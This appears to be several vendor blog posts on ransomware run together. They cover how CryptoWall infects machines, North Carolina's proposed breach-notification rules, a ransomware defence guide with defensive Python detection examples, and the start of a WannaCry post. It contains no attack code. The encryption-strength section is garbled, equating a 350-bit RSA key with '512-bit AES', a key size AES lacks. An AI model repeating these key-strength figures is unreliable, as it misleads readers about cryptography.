The State of CryptoWall in 2018

CryptoWall and its variants are still favorite toys of the cybercriminals that want your Bitcoin. In fact, according to the 2018 Verizon Data Breach Investigation Report, ransomware incidents now make up about 40% of all reported malware incidents! Some reports say CryptoWall 3.0 has caused over 325 million dollars in damages since it first came on the scene.

CryptoWall first appeared in the wild around 2014: since then, cybercriminals have updated and iterated on it several times to make it even harder to detect and remove.

The CryptoWall virus is cheap and easy to use, spreads fast, and people continue to pay the ransom hoping to get their files back. (Tl;dr: Don’t.) It’s important to maintain constant vigilance to protect data from the CryptoWall virus and all its variants – along with all types of cyberattacks.

What is CryptoWall?

CryptoWall is a particularly nasty form of ransomware. It does much more than just encrypt your files and prompt you to pay for the key: it tries to hide inside the OS and adds itself to the Startup folder. Worse still, CryptoWall deletes volume shadow copies of your files – making it difficult (or in some cases impossible) to restore your data. And while it’s there, it’ll try to get your passwords and Bitcoin wallets for good measure.

CryptoWall 3.0 is by far the most lucrative version so far. It uses strong RSA-2048 encryption to lock your files and try to get you to pay the ransom.

CryptoWall v4 introduced a new feature to encrypt both the files and the filenames, meaning that you can’t simply look at the filename to check (and restore) if you have a backup. The ransom notes got a lot sassier as well, just to pour salt on the wound of your encrypted data.

CryptoWall v5.1 is the latest version and is based on the HiddenTear malware. It uses a different scheme, AES-256 encryption, that is not continuous with the previous versions. It’s possible that the developers used the CryptoWall name, but none of the original code.

There are several variants of CryptoWall: CryptoDefense is one of those variants, for example. For the most part, you can treat them similarly.

How CryptoWall Works

There are several different methods to spread CryptoWall and infect devices:

  • Phishing Email: CryptoWall is most often triggered by the end user via a phishing email. Phishing emails try to trick users into clicking a link which downloads malware onto their computer.
  • Exploit Kits: The next most common attack vector is as part of an exploit kit, which takes advantage of security vulnerabilities to deploy the malware needed to execute the attack. Known vulnerabilities can be in the operating system, in applications you use, or in websites you visit, like WordPress.
  • Malicious Ads: Cybercriminals purchase or hack internet advertisements to deliver malware to you through your browser. Hacked ads often try to run javascript in your browser to download the malware without you noticing.

NOTE: Code injection is a common hacking technique, and it does not always have to take advantage of a bug or be malicious.

Once it’s on your computer, CryptoWall injects new code into explorer.exe (based on the version of Windows installed) and restarts explorer.exe. This special version of explorer.exe installs malware, deletes the volume shadow copies, disables Windows services, and spawns a new svchost.exe process with more injected modules.

If, for some reason, it fails to inject code into explorer.exe, CryptoWall will use svchost.exe to spawn a new explorer.exe it can inject the code into. This instance of svchost.exe is also responsible for network communication to home base, file encryption, and removing the malware once it’s finished.

CryptoWall installs itself into the registry and your startup folder: restarting won’t clear things up – if you don’t remove all of the CryptoWall software while you are in Safe Mode, it will start right back up when you log in again.

CryptoWall needs to communicate with a Command and Control (C&C) server to continue the ransomware attack. The C&C server sends CryptoWall the encryption key that it will use to encrypt your files. CryptoWall then runs through all of your files, both locally and on any connected networks, and encrypts your most personal data, for example, your documents, presentations, code, music files, and pictures.

The encryption locks the contents of your files, and the only way to get them back is with the encryption key.

What CryptoWall Tells You to do

Once the encryption is complete, you’ll get a ransom note with instructions on how to make payment: often about $1000 worth of Bitcoin. After the ransom note is issued, the malware deletes itself.

The attackers might offer to decrypt a file or two for free to demonstrate good faith: don’t fall for it. There is no guarantee that you will get your files back: only 19% of users that pay the ransom get their files back.

How to Protect Against CryptoWall?

It’s unlikely that you’ll get your files back: in this case (and most ransomware cases), prevention is better than a cure.

Tips to prevent (or disarm) potential ransomware attacks:

  • Keep your computer patched and up to date
    • Malware uses known vulnerabilities in software to move to new computers. If you leave those vulnerabilities unpatched, you’re effectively leaving an open door for the cybercriminals to enter. If you keep the OS and all of your applications patched to the latest releases, you stand a better chance of avoiding malware infections.
  • Use an anti-virus scanner
    • Anti-virus solutions, when updated regularly, can protect you from several kinds of malware attacks. They quarantine known malware programs and prevent them from executing.
  • Use a firewall
    • A local firewall can protect you from some connections that malware uses, like the one to the Command and Control server. The CryptoWall ransomware, in particular, depends on a connection to home base to continue the attack. A local firewall may be able to prevent the malware from making that connection and so kill the attack.
  • Don’t click the links
    • Don’t click links or download files from suspicious emails. If you click a malicious link or download a malicious file, you’re inviting the cybercriminal and their malware into your home.
  • Practice safe browsing habits
    • Make sure your browser is up to date, use the strongest encryption you can, and turn off ads and JavaScript by default. Be selective in what ads you allow to run – and make sure those are from trusted sources.
  • Back up your files
    • Always keep a backup copy of your files. It works for a hard drive failure or for ransomware. There are plenty of online cloud storage options of varying security levels and cost. You can also set up a local SAN or USB hard drive to back up your important files.

If CryptoWall slips past your defenses and infects your computer, remove CryptoWall before you use your computer again:

  1. Boot your computer into Safe Mode with Networking.
  2. If you have a recent, clean System Restore point, restore from it; if not, continue with the next steps.
  3. Download and install a malware removal application.
  4. Run the malware removal app and scan all of your files.

If you’re planning an enterprise-wide security strategy to protect against ransomware attacks, there are a few other items to consider on top of the end user items above.

Maintain a least privilege model: When you maintain a least privilege model, users only have access to the files absolutely necessary to do their job – and if hit by CryptoWall, the ransomware can only encrypt those files. By enforcing a least privilege model, you’re limiting the scope of the ransomware attack by a lot. And with a good backup plan, it’s a simple recovery process.

Leverage security analytics to protect your files from ransomware: Varonis monitors your enterprise data stores, mailboxes, proxies, DNS, and VPNs – with threat models specifically designed to catch ransomware attacks in progress.

A ransomware attack can be devastating to an organization: lost productivity, potentially leaked, stolen, or lost data, recovery fees and resources, and more. Get a custom demo to see how we can protect your valuable data and help stop CryptoWall infections.

North Carolina Proposes Tougher Breach Notification Rules

If you’ve been reading our amazing blog content and whitepaper on breach notification laws in the US and worldwide, you know there’s often a hidden loophole in the legalese. The big issue — at least for data security nerds — is whether the data security law considers mere unauthorized access of personally identifiable information (PII) to be worthy of a notification.

This was a small legal point until something called ransomware came along.

You have heard of ransomware, right?

It’s that low-tech, but deadly malware that accesses data and encrypts it. To get the data back, the victim has to send a couple of bitcoins to the digital extortionists.

Last year ransomware had more than a few high-profile victims in the US, as well as, of course, across the globe.

But at the US state level, the difference between access alone and access and acquisition — the legal verbiage for copying — in a notification law determines whether the breach is to be reported to local authorities.

Based on my own research, I could only find a few states for which a ransomware attack would have to be reported locally. I should add that even for states that allow for just unauthorized access of PII, there’s often an additional “harm threshold” to the consumer (financial or credit risk, for example) that would have to be met, and so would rule out a pure ransomware attack in which the data wasn’t copied.

After factoring this in, I found only three states for which a ransomware attack ipso facto (I finally get to use that phrase!) would require a notification: New Jersey, Connecticut, and Virginia.

You can look through these charts prepared by some law firms for yourself, and if you come up with other candidates, let me know!

North Carolina: Laboratory of Democracy!

But wait, a legislator in the great state of North Carolina along with the attorney general last month proposed a change to the statutory language defining a breach.

This tweak moves NC from a state that considers a breach to be unauthorized access and acquisition — see section 75-61 (14) of its statutes — to unauthorized access or acquisition.

Now NC joins the aforementioned club for which ransomware attacks will by themselves force companies to notify authorities and consumers.

The new law will also change the time window in which the data breach will have to be reported after discovery. Searching through a huge PDF table of state breach laws, I can say most if not all states ask that a breach be reported “without unreasonable delay.”

Obviously, these words can be subject to interpretation. The proposed NC law instead sets the time limit to just 15 days.

I’m not aware of any other state that has a specific deadline.

The new law also adds consumer-friendly language that makes credit freezes — remember the outcry after Equifax — free upon request. Up to five years of credit monitoring will also be free of charge.

The law is supposed to tighten the rules on fines as well.

We’ll have to wait for the legislation to be reviewed and approved before we have the final legal details.

We’ll keep you posted.

North Carolina Has Lots of Breaches

Looking at the 2017 annual breach report produced by their Department of Justice, I was surprised to learn that over 1000 breaches were reported in this state alone.

That’s an incredibly large number. For comparison purposes, take a peek at California’s breach report for the years 2012-2015. The incident counts are dramatically smaller (178 in 2015).

I’m not sure what explains the difference. But perhaps NC clearly has lots of law-abiding businesses, especially consumer-facing ones holding PII.

By the way, the current NC law covers an extensive list of identifiers, not only the usual social security, driver’s license, and account numbers, but also PINs, online passwords, digital signatures, and email addresses. This broad PII definition may have something to do with the NC data breach reporting spike we’re seeing.

In any case, if you combine their generous list of PII and the newer breach notification rules, then you’ll have to admit that NC has upped its digital security game and may even be number one, moving past the formidable California and its tough breach law.

And of course, go Wolfpack.

Want to be a legal eagle amongst your IT security peers when it comes to breach notification laws and ransomware? Download our comprehensive white paper on this fascinating subject!

Ransomware Guide and Protection

What is Ransomware?

Ransomware – malware that encrypts a victim’s data and extorts a ransom, to be paid within a short time frame or risk losing all of the files – has been around for quite some time. In 1989 the first known ransomware, dubbed the AIDS Trojan, infected 20,000 floppy diskettes – remember those? The diskettes supposedly contained information on the AIDS virus and were handed out during a conference. Upon loading the DOS-based software from the disk, the program counted the number of times the computer was rebooted. Once it reached 90, it would hide the directories, encrypt the names of the files and request $189.00 to decrypt the files.

How Ransomware Works

Ransomware works by marrying three separate functions:

1. Distribution

Different ransomware strains spread via different means. This may include any combination of drive-by malware ads, spreading via document macros, or leveraging operating system or application vulnerabilities.

2. Holding Data Hostage

Similarly, each ransomware strain has a different method of removing data from the infected system’s control. In many cases, the data is actually encrypted, but it is just as likely that it’s deleted and a file of garbage bits left in its place.

3. Digital Payment

Once the files are out of the users’ control, payment of some kind is requested. While Bitcoin (and other cryptocurrencies) are often used as a direct form of payment, indirect methods of payment, like deliberately spreading the ransomware within a company, downloading a digital good, or other payments in kind, have also been reported.

Together, these three functions define any strain of ransomware.

Who is the Target of Ransomware?

Most ransomware reports are of large companies that have been brought to their knees by a ransomware attack. However, in most cases ransomware spreads indiscriminately.

It is an equal opportunity attack affecting businesses of all sizes, government agencies and personal computing devices indiscriminately.

Ransomware is a means of monetizing a vulnerability found in an organization’s application or network infrastructure. Who’s the target? Everybody.

Ransomware Today

Ransomware has evolved from its early sneaker-net roots, leveraging the Internet and email to spread to different computers. However, it still follows a predictable script, not all that different from the original AIDS Trojan. After entering our networks via a phishing attack, files get encrypted, and the user sees a notification with instructions on how to submit bitcoins in order to decrypt files.

Unfortunately, ransomware attackers have seen how lucrative ransom payments can be. With each attack worth hundreds to thousands of dollars or more, they’ve become even more ambitious with the amount they’re demanding, and how they’re demanding it.

How’s this for ambition: some attackers, even after you’ve paid them the ransom, only partially unlock the files in an effort to demand even more from vulnerable businesses. In one case, a hacker even demanded a ransom as high as one million dollars.

They’re also pushing the boundaries to see how quickly they’re able to extort from unprepared individuals and organizations. Recently, we were introduced to a different attack vector with WannaCry. Instead of a phishing attack, attackers used the NSA’s ETERNALBLUE exploit, allowing it to spread peer-to-peer within an organization, impacting vulnerable Windows machines – laptops, desktops, tablets, and servers.

The result? WannaCry was the fastest and largest ransomware attack we’ve seen so far. However, some security experts are already debating whether the latest NotPetya attack is even deadlier than WannaCry.

By experimenting with how an attack is released, how much to extort, and the intensity and velocity with which they spread harm, hackers advance their knowledge base, changing how they develop new strains as well as their attack vectors.

What hasn’t changed is that it is still possible to detect and prevent a zero-day ransomware attack – that’s according to a Northeastern University ransomware research paper. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, this research team analyzed 1,359 ransomware samples between 2006 and 2014, and found that a “close examination on the file system activities of multiple ransomware samples suggests that by… protecting Master File Table (MFT) in the NTFS file system, it is possible to detect and prevent a significant number of zero-day ransomware attacks.”

Bitcoin and Ransomware

Bitcoin is often associated with ransomware because attackers typically request payments to be submitted in that form of currency. But what exactly is bitcoin?

Bitcoin is a cryptocurrency that with some effort lets you semi-anonymously buy goods and services. You can send bitcoins digitally using a mobile phone app or computer. It’s not quite as easy as swiping a credit card, but removes a large amount of risk from the receiver.

Bitcoins are stored in a digital wallet, which resides in the cloud or on a user’s computer. It’s similar to a bank account, but they’re not insured by the FDIC. Also, bitcoins aren’t tied to any country, subject to regulation, and there are no credit card fees.

Each bitcoin transaction is on a public log. Names of buyers and sellers are anonymous – only their wallet IDs are revealed. This allows buyers or sellers to do business without it being easily traced back to them. As a result, bitcoin has become a popular choice of payment for cybercriminals. To evade identification, many bitcoin addresses used by cybercriminals have no more than 6 transactions.

To make a bitcoin payment, victims are often alerted to download anonymous browsers, such as Tor2web or Torproject, in order to visit a URL hosted on anonymous servers. Tor (The Onion Router) makes it difficult to trace the location of the server or the identity of its operators.

Ransomware: Should You Pay?

The short answer is: it depends.

But Some Say, Yes

At a Cybersecurity Summit, Joseph Bonavolonta, the Assistant Special Agent in charge of the FBI’s CYBER and Counterintelligence Program said, “To be honest, we often advise people just to pay the ransom.”

He explained, “The success of the ransomware ends up benefitting victims: because so many people pay, the malware authors are less inclined to wring excess profit out of any single victim, keeping ransoms low. And most ransomware scammers are good to their word. You do get your access back.”

If you do pay, the FBI stated that most ransomware payments are typically between $200 and $10,000.

But there have been instances where the payment has been much higher. In 2014, the City of Detroit’s files were encrypted and the attackers demanded a ransom of 2,000 bitcoins, worth about $800,000. Luckily, the ransom was not paid because the database wasn’t used or needed.

There might be times when you’re faced with other considerations. The Tennessee Dickson County Sheriff’s Office paid $622.00 in bitcoin to hackers who encrypted the department’s criminal case files, making them inaccessible to investigators. Detective Jeff McCliss said, “It really came down to a choice between losing all of that data – and being unable to provide the vital services that that data would’ve assisted us in providing the community versus spending 600-and-some-odd dollars to retrieve the data.” The department was lucky; it got back access to its files.

Thou Shall Not Pay

Some security experts disagree with Mr. Bonavolonta’s remarks and urge you not to pay the ransom because there’s no guarantee that, even after you pay, your files will return to their original state. Moreover, paying perpetuates an ongoing problem, making you a target for more malware.

In 2016 it was reported that a Kansas hospital hit with ransomware paid the ransom in hopes of getting back to business as soon as possible, but the payment only partially decrypted their files. Instead, the cybercriminals demanded more money to decrypt the rest. As a result, the hospital refused to pay the second ransom because it was no longer “a wise maneuver or strategy.”

Worse, if you get infected with a defective strain such as Power Worm, you won’t get your files back regardless of what you do. Even if you intend to pay the ransom, this attack inevitably destroys the victim’s data during encryption.

Alternatively, if you encounter an attack like NotPetya where the intention wasn’t about financial gain, but destroying data, even if you stockpile bitcoins to pay the ransom, you won’t get your data back.

The Department of Homeland Security has also advised victims not to negotiate with hackers. Conflicting advice has prompted a debate about whether the FBI is encouraging behavior that will lead to more hacking.

In a Wall Street Journal interview, FBI spokeswoman Kristen Setera declined to say if FBI officials recommend paying a ransom to hackers, as Mr. Bonavolonta stated.

Why You Should Work With Law Enforcement

John Carlin, former Assistant Attorney General for the U.S. Department of Justice’s National Security Division acknowledged in a recent podcast that there remains confusion at the FBI on whether or not you should pay.

He confirmed that the FBI officially does not encourage paying a ransom. However, similar to a kidnapping case, that doesn’t mean that if you go to law enforcement they will recommend against paying.

But one thing is for certain. If you do go to law enforcement, they will be able to provide a few insights that you wouldn’t otherwise know.

First, law enforcement can provide you with valuable information. Carlin advised, “If it’s a group they’ve been monitoring, they can tell you…whether they’ve seen that group attack, other actors, before, and if they have, whether if you pay they’re likely to go away or not. Because some groups just take your money and continue.”

Secondly, he also identified a major benefit to working with law enforcement – you’ll be hedging against the risk of inadvertently paying off a terrorist when you pay the ransom. He advised, “You can end up violating certain laws when it comes to the Office of Foreign Assets Control by paying a terrorist or another group that’s designated as a bad actor. But more importantly, you do not want to be in a situation where it becomes clear later that you paid off a terrorist.”

But Before You Pay, Find Out If There’s A Decryption Tool

Finally, if you are faced with managing a ransomware attack, go online to see if a decryption tool exists. If you’re able to find the keys, there’s no need to pay. Sometimes, when the police and security experts investigate cybercriminal activity, they can obtain decryption keys from malicious servers and share them online, as happened for CoinVault, TeslaCrypt, and the popular CryptoLocker.

Keep in mind, whether or not you pay the ransom, the cumulative cost of a ransomware attack is typically greater than the ransom. The cost to the brand, loss of productivity, legal fees, etc., all accrue once the attack vector is triggered.

Perhaps another way that might help you decide is to understand the type of ransomware you’re dealing with.

Ransomware Types

Let’s get started. In Cutting the Gordian Knot: A Look Under the Hood of Ransomware Attacks, researchers identified three major types: encryption, deletion, and locking.

Encryption

CryptoLocker and CryptoWall have a reputation for being strong encryption ransomware. Encryption is the process of applying an algorithm (also known as a cipher) to data so it is unintelligible to anyone who does not hold the key. To decrypt the data, you’ll need keys. There are two types: symmetric and public.

Symmetric Keys

Advanced Encryption Standard (AES), Rivest Cipher 4 (RC4), and Data Encryption Standard (DES) are examples of symmetric-key algorithms. With symmetric encryption, the same key is used for both encryption and decryption. It’s only effective when the symmetric key is kept secret by the two parties involved.


Public Keys (Asymmetrical Key)

Rivest, Shamir, and Adleman use two different keys in their famous RSA algorithm: a public key that everyone has access to, and a private key that is controlled by the person with whom you wish to communicate.


Strength of an Encryption

To understand the strength of the encryption, you have to look at both the type of encryption being used – whether symmetric or public/asymmetric – and the key length.

Two important facts: the longer the key, the stronger the encryption, and key length is measured in bits.

Breaking an Encryption

For a symmetric algorithm, you’ll need a couple of hours of computer time for something like a 20-bit key, or years for a 128-bit key (2^128 = 340282366920938463463374607431768211456 possible 128-bit keys).

For a public key algorithm, a key length of 32 bits would only require 2^32 combinations. Even a 512-bit key can be easily broken (within a few months), but 2,048-bit is far harder.

Comparing public and symmetric keys can be confusing. Here’s a rough benchmark: a 350-bit RSA key is roughly considered the same strength as 40-bit RC4 and 512-bit AES.

The wonky reasons for these differences in key-breaking speeds have to do with the fact that in RSA, you have to factor a number—don’t ask!

Ransomware Encryptions

The first ransomware variants used a symmetric-key algorithm and eventually upgraded to public-keys. Today, more advanced ransomware use a combination of symmetric and public.

Most cybercriminals probably wouldn’t use a public key to encrypt a large file system because it is much slower than symmetric key encryption. And taking too long to encrypt files could thwart the ransomware operation before the encryption process is fully completed.

So a better idea is to use symmetric techniques to quickly encode the file data, and asymmetric to encode the key. In CryptoLocker, for example, AES (symmetric) was used for file encryption and RSA (public) for AES key encryption.

Another blend you might see in the near future is elliptic curve cryptography (ECC) and RSA. ECC is described as the next generation of public key cryptography, in which you can create faster, smaller, and more efficient cryptographic keys. Some researchers say that ECC can yield a level of security with a 164-bit key that other systems require a 1,024-bit key to achieve.

Deletion

With deletion, attackers threaten and warn: any of your attempts to decrypt files would only result in an “irrevocable loss of your data.” Or if you don’t pay, the files get deleted. Popular examples of deletion include Gpcode and FileCoder.

Typically when we delete something, we wipe it off the disk. But in analyzing all the samples, the researchers learned that lots of data remained on disk because attackers were lazy, often choosing the easiest path. However, they’re also very clever. The researchers found that while the NTFS Master File Table indicated that files were deleted, the files were actually still on disk, so recovery is potentially possible. However, depending on the strain and how ransomware evolves, there’s also the potential that your data might be destroyed.

Locking

With locking, attackers create a new login screen or HTML page that makes it appear as though a law enforcement agency has taken over the computer. They display a warning pertaining to laws such as those on copyrighted materials or child pornography. Or they might disable other components, typically keyboard shortcuts. Examples include Winlock and Urausy.

Ransomware Attack Vectors

You can bet that new types of ransomware are constantly being developed, including attack vectors that aren’t like the usual garden variety, such as malvertising, ransomworm, and peer-to-peer file transfer programs.

As I was once reminded by a security pro, attacks don’t need to be complicated. It can be something as simple as a link in an email or an email attachment, and that’s what most ransomware strains rely on to get into your network. Therefore curious individuals who can’t resist clicking on links or opening attachments would benefit from security awareness training.

Let’s not forget the devastating effects of WannaCry and NotPetya, so make sure your software is up-to-date so that your security updates are also up-to-date!

We’re also seeing more instances of Ransomware-as-a-Service, where hackers sell their malware to other cybercriminals, increasing the frequency and reach of ransomware. Ransomware authors can enlist anyone to sign up and everyone would earn a percentage of the profits. To combat this problem, organizations might benefit from a few mitigation strategies, which we’ll cover later.

What to Do After You’ve Been Infected with Ransomware

Most people don’t realize they’ve been infected until their screen displays a ransom note, notifying them that their files have been encrypted.

If you discover that your computer has been infected:

  1. Shut down your computer or disconnect it from the network.
  2. If you’ve decided against paying the ransom, scan your computer with an anti-virus or anti-malware program and let it remove everything.
  3. If you have a backup, restore your files.
  4. If you don’t have a backup, check if it’s possible to identify the ransomware strain from the encrypted files or note. If it is and a decryption or recovery tool is available, use that.
  5. Identify how the infection occurred and what you need to do to prevent a recurrence.

One caveat is that backups aren’t 100% fail safe. Some ransomware strains will either encrypt your backups or worse, hide in your backups so that after you restore files they will attack again.

However, if you decide to pay the ransom, you have our sympathy! We empathize and understand what a pain it must have been and hope that once you pay, all your files get decrypted. Don’t forget to scan your computer with an anti-virus or anti-malware program and let it remove everything. Also, review the mitigation methods below!

Ransomware Removal

The term ransomware defines a group of malware by its behavior. As such, it’s difficult to apply a one-size-fits-all strategy to remove an infection. In some cases, like where weak or missing API credentials are compromised, there may not actually be an infection. An example of this occurred when tens of thousands of MongoDB databases had their data encrypted remotely because their owners had failed to change the default password.

The best policy to pursue is one of identification and then mitigation.

Ransomware Mitigation Methods

Monitor File System Activity

After looking at 1,359 ransomware samples, the Northeastern University researchers learned that it is possible to stop a large number of ransomware attacks, even those using deletion and encryption capabilities.

Significant changes occur in the file system (i.e., a large number of deletions in the log) when the system is under attack. By closely monitoring the file system logs and configuring your monitoring solution to trigger an alert when this behavior is observed, you can detect the mass creation, encryption, or deletion of files.

User Behavior Analytics or Signature-Based?

Some IT pros have turned to endpoint security solutions in the hope that it will detect and stop crypto-malware. However, the industry is catching on to the fact that, as one observer put it, “signature-based antivirus software that most organizations still rely on to defend them can’t cope with modern attacks.”

A recent CIO article described the drawback best:

 “… while a signature-based approach reduces the performance hit to the systems on which it runs, it also means somebody has to be the sacrificial sheep. Somebody has to get infected by a piece of malware so that it can be identified, analyzed and other folks protected against it. And in the meantime, the malefactors can create new malware that signature-based defenses can’t defend against.”

Bottom line: endpoint security solutions can’t block unknown ransomware variants by, for example, blacklisting connections to a current (but outdated) list of C&C servers. They’re also bound to a device/user/process, and so don’t provide any anti-heuristics or debugging techniques.

Instead, User Behavior Analytics (UBA) has become an essential go-to ransomware prevention measure, and it has also been known to detect zero-day ransomware attacks.

Defending the inside from legitimate users is just not part of the equation for perimeter-based security, and hackers are easily able to go around the perimeter and get inside. They enter through legitimate public ports (email, web, login) and then operate as users.

Once in, cybercriminals have become clever at implementing a ransomware attack that isn’t spotted by anti-virus software.

In fact, to an IT admin who is just monitoring their system activity, the attackers appear as just another user.

And that’s why you need UBA!

UBA really excels at handling the unknown. In the background, the UBA engine can baseline each user’s normal activity, and then spot variances and report in real time – in whatever form they reveal themselves. For instance, an IT admin can configure a rule to, say, spot thousands of “file modify” actions in a short time window.

UBA takes a cross-system approach, too: it can notice abnormal file behavior combined with weird email actions combined with weird login behavior (from Active Directory). Think of UBA as File System Monitoring 2.0 – and keep in mind that the best UBA benefits from having the most context.

Create Honeypots

Cybercriminals may avoid encrypting all files and start by encrypting recently accessed files. Create a decoy by planting fake files and folders, and monitor them regularly.

This is also a good method for organizations that don’t have an automated solution to monitor file access activity. That also means you might be forced to enable the file system’s native auditing, which unfortunately taxes the monitored systems. Instead, prioritize sensitive areas and set up a file share honeypot.

A file share honeypot is an accessible file share that contains files that look normal or valuable, but in reality are fake. As no legitimate user activity should be associated with a honeypot file share, any activity observed should be scrutinized carefully. If you’re stuck with manual methods, you’ll need to enable native auditing to record access activity, and create a script to alert you when events are written to the security event log (e.g. using dumpel.exe).
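To make the two detection ideas above concrete (the file-system monitoring rule that fires on thousands of modifications in a short window, with a per-user baseline in the UBA spirit, and the honeypot share where any access at all is suspicious), here is an added example in Python. It is not code from this article or from Varonis. The audit line format ("<ISO-8601 UTC timestamp> <user> <action> <path>"), the user names, the share paths, the 60-second window and the thresholds are all assumptions made up for the example; real Windows object-access events carry the same fields in a different layout, so the parser is the part you would swap out.

```python
"""Burst and honeypot detection over constructed file-access audit lines.

Added example, not code from the original article or from Varonis. The line
format is an assumption: "<ISO-8601 UTC timestamp> <user> <action> <path>",
one event per line.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Actions that a mass-encryption run produces in volume.
WRITE_ACTIONS = {"create", "modify", "delete", "rename"}
TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line):
    """Parse one audit line into (timestamp, user, action, path)."""
    ts, user, action, path = line.split(" ", 3)
    return datetime.strptime(ts, TS_FORMAT), user, action.lower(), path


def parse_log(text):
    return [parse_line(l) for l in text.splitlines() if l.strip()]


def detect_bursts(events, baseline, window=timedelta(seconds=60), floor=50, factor=10):
    """Flag users whose write count in any sliding window exceeds their threshold.

    baseline maps user -> typical writes per window learned from history (the
    UBA idea); threshold = max(floor, factor * baseline), so a user the engine
    has never seen gets the absolute floor. Returns one alert per user.
    """
    recent = defaultdict(deque)
    alerts = {}
    for ts, user, action, _path in sorted(events, key=lambda e: e[0]):
        if action not in WRITE_ACTIONS:
            continue
        q = recent[user]
        q.append(ts)
        while ts - q[0] > window:          # drop events that fell out of the window
            q.popleft()
        threshold = max(floor, factor * baseline.get(user, 0))
        if len(q) >= threshold and user not in alerts:
            alerts[user] = {"count": len(q), "first": q[0], "last": ts}
    return alerts


def detect_honeypot_access(events, honeypot_prefixes):
    """Any touch of a decoy share is suspicious regardless of volume."""
    prefixes = tuple(p.lower() for p in honeypot_prefixes)
    return [e for e in events if e[3].lower().startswith(prefixes)]


def build_sample_log():
    """Constructed sample: alice edits normally; bob rewrites 120 files in 40 s
    and then opens a file on the decoy share. Users and paths are made up."""
    base = datetime(2018, 5, 14, 9, 0, 0)
    lines = []
    for i in range(5):
        t = base + timedelta(minutes=3 * i)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} alice modify \\\\fs01\\finance\\report{i}.docx")
    for i in range(120):
        t = base + timedelta(minutes=10, seconds=i // 3)
        lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} bob modify \\\\fs01\\hr\\file{i}.xlsx.wncry")
    t = base + timedelta(minutes=11)
    lines.append(f"{t:%Y-%m-%dT%H:%M:%SZ} bob modify \\\\fs01\\decoy-finance\\payroll.xlsx")
    return "\n".join(lines)


if __name__ == "__main__":
    evts = parse_log(build_sample_log())
    print(detect_bursts(evts, {"alice": 2, "bob": 2}))
    print(detect_honeypot_access(evts, [r"\\fs01\decoy-"]))
```

Two design points: the burst rule alerts once per user as soon as the window fills, so the alert arrives while the encryption run is still in progress rather than after it, and the honeypot rule has no threshold at all, because the decoy share exists only to be left alone.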

Least Privilege Model

Another approach is to control access to data and work towards achieving the least privilege model. Your goal is to reduce exposure quickly by removing unnecessary global access groups from access control lists. Groups such as “Everyone,” “Authenticated Users,” and “Domain Users,” when used on data containers (like folders and SharePoint sites), can expose entire hierarchies to all users in a company. In addition to being easy targets for theft or misuse, these exposed data sets are very likely to be damaged in a malware attack. On file servers, these folders are known as “open shares”, where both file system and sharing permissions are accessible via a global access group.
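An added example of the open-share check described above, written in Python and not taken from this article or from Varonis. The share inventory is constructed for the example; the global group names are the three the paragraph names. A share counts as open only when a global group has rights at both the share level and the NTFS level, since effective access needs both, and the check separates open shares that are writable (where ransomware can overwrite files) from read-only ones.

```python
"""Find 'open shares': folders where a global access group has rights at both
the share level and the NTFS level. Added example, not Varonis code; the share
inventory below is constructed and the group names follow the article's list."""

GLOBAL_GROUPS = {"everyone", "authenticated users", "domain users"}
WRITE_RIGHTS = {"write", "modify", "full"}   # rights that let ransomware overwrite files

# Constructed inventory: share -> ACLs mapping principal -> set of rights.
SHARES = {
    "Finance": {
        "share_acl": {"CORP\\Finance-Staff": {"full"}},
        "ntfs_acl": {"CORP\\Finance-Staff": {"modify"}, "BUILTIN\\Administrators": {"full"}},
    },
    "Public": {
        "share_acl": {"Everyone": {"full"}},
        "ntfs_acl": {"CORP\\Domain Users": {"modify"}, "BUILTIN\\Administrators": {"full"}},
    },
    "Templates": {
        "share_acl": {"Everyone": {"read"}},
        "ntfs_acl": {"NT AUTHORITY\\Authenticated Users": {"read"}},
    },
    "Scans": {
        "share_acl": {"Everyone": {"full"}},
        "ntfs_acl": {"CORP\\Scanner-Svc": {"modify"}},
    },
}


def global_grants(acl):
    """Return the entries of an ACL that grant rights to a global access group."""
    return {p: r for p, r in acl.items()
            if r and p.split("\\")[-1].lower() in GLOBAL_GROUPS}


def assess_share(name, share):
    """Classify one share and list the global groups to remove from its ACLs."""
    at_share = global_grants(share["share_acl"])
    at_ntfs = global_grants(share["ntfs_acl"])
    to_remove = sorted(set(at_share) | set(at_ntfs))
    if not (at_share and at_ntfs):
        # Effective access needs both layers, so one restricted layer closes the
        # share, but a global group on either layer is still worth cleaning up.
        return {"share": name, "status": "restricted", "remove": to_remove}
    writable = (any(r & WRITE_RIGHTS for r in at_share.values())
                and any(r & WRITE_RIGHTS for r in at_ntfs.values()))
    status = "open-writable" if writable else "open-readonly"
    return {"share": name, "status": status, "remove": to_remove}


def find_open_shares(shares):
    """Names of the open shares, most dangerous (writable) first."""
    findings = [assess_share(n, s) for n, s in shares.items()]
    order = {"open-writable": 0, "open-readonly": 1, "restricted": 2}
    return [f["share"] for f in sorted(findings, key=lambda f: order[f["status"]])
            if f["status"] != "restricted"]


if __name__ == "__main__":
    for name, share in SHARES.items():
        print(assess_share(name, share))
```

On a real file server the two ACL dictionaries would be filled from the share and NTFS permissions rather than typed in, but the ordering is the useful part: the writable open shares are the ones to fix first.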

Ransomware Examples

With the rise of ransomware toolkits (prepackaged bits of code for the various ransomware functions), it’s become harder to differentiate between ransomware strains.

CryptoLocker: One of the earlier and quintessential ransomware strains. Among the first to demand payment via Bitcoin. Distinguished by its good “customer service” and the fact that it did actually decrypt your files.
Petya/NotPetya: This strain was spread through a vulnerability in a web-based accounting system used by Eastern European companies. Notable because it affected the boot process, preventing users from logging in.
PUBG: PUBG (PlayerUnknown’s Battlegrounds) is a popular online game. One enthusiastic supporter took some off-the-shelf ransomware and made the unlock key dependent upon playing an hour of the game.

Why did last Friday’s ransomware infection spread globally so fast?

Quick ransomware background

Ransomware is a type of malware that encrypts your data and asks for you to pay a ransom to restore access to your files. Cyber criminals usually request that the ransom be paid in Bitcoins: the #1 cryptocurrency (basically a distributed ledger) which can be used to buy and sell goods. By nature, Bitcoin transactions (e.g. ransom payments) are very difficult to trace.

Historically, most ransomware infections use the attack vector – how they get in – of social engineering (like clickbait from a social media platform – think cute kitty pics on Facebook or Twitter) or email phishing campaigns, which contain attachments or links to a website. The end result is that a malicious payload gets a foothold on a machine inside a corporate network. Unfortunately, all of those next generation perimeter defenses that organizations spend good money on are not that difficult to bypass in order to get inside.

